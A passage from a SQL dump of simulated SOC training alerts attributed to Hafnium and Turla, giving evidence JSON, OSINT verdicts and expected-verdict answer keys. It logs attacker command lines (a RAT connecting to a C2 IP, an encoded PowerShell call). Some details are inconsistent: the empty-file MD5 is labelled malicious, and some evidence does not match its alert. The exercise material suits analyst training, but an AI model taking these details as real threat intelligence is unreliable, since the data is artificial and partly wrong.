exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(346, 'Cleanup and Removal of Indicators', 'high', 'System event logs', 'In an advanced attempt to evade detection, the threat actor Hafnium executed commands to remove event logs and other indicators of compromise from the system. This action is aimed at erasing traces of their presence and prolonging unauthorized access.', 'Defense Evasion', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":1102,\"log_name\":\"Security\",\"source\":\"Microsoft-Windows-Eventlog\",\"task_category\":\"Log Clear\",\"level\":\"Information\",\"user\":{\"id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"name\":\"hacker_user\"},\"computer\":\"compromised-host.local\",\"description\":\"The audit log was cleared.\",\"ip_address\":\"192.168.1.45\",\"malicious_ip\":\"203.0.113.5\",\"deleted_files\":[\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"C:\\\\Temp\\\\malware.exe\"],\"hash\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Hafnium infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\",\"is_critical\":true,\"osint_result\":{\"source\":\"virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known Hafnium malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was 
cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was 
cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(347, 'Initial Access via Spear Phishing', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting a diplomatic network. The email contained a malicious attachment believed to be linked with the Turla APT group. The email was sent from a known malicious IP address and contained a weaponized document aimed at exploiting vulnerabilities to gain an initial foothold.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:32:00Z\",\"email_id\":\"345abc678def901234ghi567\",\"sender\":\"malicious.actor@example.com\",\"recipient\":\"john.doe@diplomat.org\",\"subject\":\"Urgent: Diplomatic Meeting Itinerary\",\"attachment\":\"Meeting_Agenda.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_family\":\"CobraDoc\",\"detection\":{\"rule_id\":\"PHISH-001\",\"rule_name\":\"Spear Phishing with Malicious Attachment\",\"confidence\":\"High\"}}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious.actor@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Known phishing email sender associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Turla APT infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Turla weaponized document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Meeting_Agenda.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Filename 
commonly used in spear phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing\",\"date\":\"2026-02-01T20:32:18.942Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(348, 'Execution of Remote Access Tool', 'high', 'Endpoint Detection and Response', 'With initial access secured, Turla deploys a remote access tool to execute commands and further their control over the infected endpoint. Anomalous execution detected on endpoint with associated malicious artifacts.', 'Malware Execution', 'T1219 - Remote Access Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"E12345\",\"event_type\":\"malware_execution\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.45.67.89\",\"username\":\"jdoe\",\"process_name\":\"rat_tool.exe\",\"process_hash\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe -connect 185.45.67.89\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe\",\"indicator\":\"Turla RAT\",\"device_id\":\"DESKTOP-ABCD1234\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.45.67.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known Turla command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"rat_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Turla RAT\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 
Directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(349, 'Rootkit Deployment for Persistence', 'high', 'System Event Logs', 'To ensure continued access, Turla installs a sophisticated rootkit that embeds itself deeply within the system, evading detection and enabling persistent control.', 'Persistence Mechanism', 'T1014', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"7045\",\"event_source\":\"Service Control Manager\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"service_name\":\"turla_rootkit\",\"service_file_name\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\trkl.sys\",\"service_type\":\"Kernel Driver\",\"service_start_type\":\"Auto\",\"service_account\":\"LocalSystem\",\"network_activity\":{\"external_ip\":\"185.92.220.23\",\"internal_ip\":\"192.168.1.105\",\"protocol\":\"TCP\",\"port\":443},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Turla C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host internal IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious rootkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control 
Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(350, 'Lateral Movement via Hijacked Credentials', 'high', 'Network Traffic Analysis', 'Anomalous lateral movement detected involving the use of hijacked credentials to access multiple internal systems. The activity is linked to the Turla group, known for its lateral techniques to extend network control.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"192.168.1.15\",\"protocol\":\"RDP\",\"username\":\"jdoe\",\"action\":\"Successful login\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"turla_tool.exe\",\"event_id\":\"4624\",\"description\":\"Successful logon using RDP with hijacked credentials\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Scan\",\"verdict\":\"internal\",\"details\":\"Internal corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Turla tool\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"turla_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with Turla 
APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(351, 'Exfiltration Through Satellite Link Hijacking', 'high', 'Satellite Communication Logs', 'In a final maneuver, Turla uses hijacked satellite internet links to stealthily exfiltrate sensitive data, masking the C2 traffic and evading traditional network defenses.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:16Z\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"sensitive_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"data_exfiltration\",\"protocol\":\"satellite_link\",\"malware\":\"Turla\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Turla group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Contains potentially sensitive information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 